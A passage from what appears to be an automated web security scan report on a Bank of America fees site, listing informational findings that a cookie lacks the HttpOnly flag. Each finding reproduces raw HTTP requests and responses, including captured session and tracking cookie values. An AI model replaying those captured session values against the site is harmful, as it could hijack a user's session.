mcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:30 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c249-2727-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 10023
Content-Type: image/jpeg
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

......JFIF.....d.d......Ducky.......T......Adobe.d...................................................................................................................................................D..
...[SNIP]...

4.34. http://factsaboutfees.bankofamerica.com/assets/img/lifestyle/201.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/lifestyle/201.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:29 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/lifestyle/201.jpg HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:28 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c29b-e5cd-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 58829
Content-Type: image/jpeg
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:29 GMT;path=/

......JFIF.....H.H.....-Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:07:22 16:45:05.........
...[SNIP]...

4.35. http://factsaboutfees.bankofamerica.com/assets/img/logo_BofA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/logo_BofA.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/logo_BofA.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:00 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1e2-9f3-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 2547
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:00 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

GIF89a..U.............}..?{.<y....z...\.?|........\...............'......i......h.=z._..Z......f........_n...n...../q..........K....(.....5./D........7.......f........x..?SO.....>{..}.x...............
...[SNIP]...

4.36. http://factsaboutfees.bankofamerica.com/assets/img/nav1_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/nav1_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/nav1_off.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:00 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1e0-4a0-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 1184
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:00 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

GIF89av........................................=..=..=..=..=..=..<. <.!<.-K.-K..K..K..K./K./J./J.0J.=Y.=Y.>Y.>Y.?X.?Y.?X.@X.AX.Nf.Nf.Nf.Nf.Nf.Nf.Of.Of.Of.Pf.Pf.^t.^t.^t.^t._t._t._t.`t.n..n..n..n..o..
...[SNIP]...

4.37. http://factsaboutfees.bankofamerica.com/assets/img/nav2_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/nav2_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/nav2_off.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:01 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c209-523-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 1315
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:01 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

GIF89a.........................................=..=..=..=..=..=..<..<. <.!<.-K.-K..K..K..K./K./J./J.0J.0J.=Y.=Y.>Y.>Y.?X.?Y.?X.@X.AX.Nf.Nf.Nf.Nf.Nf.Nf.Of.Of.Of.Pf.Pf.^t.^t.^t._t._t.`t.n..n..n..n..n..
...[SNIP]...

4.38. http://factsaboutfees.bankofamerica.com/assets/img/nav2_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/nav2_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/nav2_on.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:24 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1cd-31c-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 796
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:24 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:24 GMT;path=/

GIF89a......................................................}}}.............................................!.......,.......@...P.D...`.l..0K ...c4..=.7.......V..X6".....8.KF...B....!f(..&..`...D..
...[SNIP]...

4.39. http://factsaboutfees.bankofamerica.com/assets/img/nav2_over.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/nav2_over.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/nav2_over.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
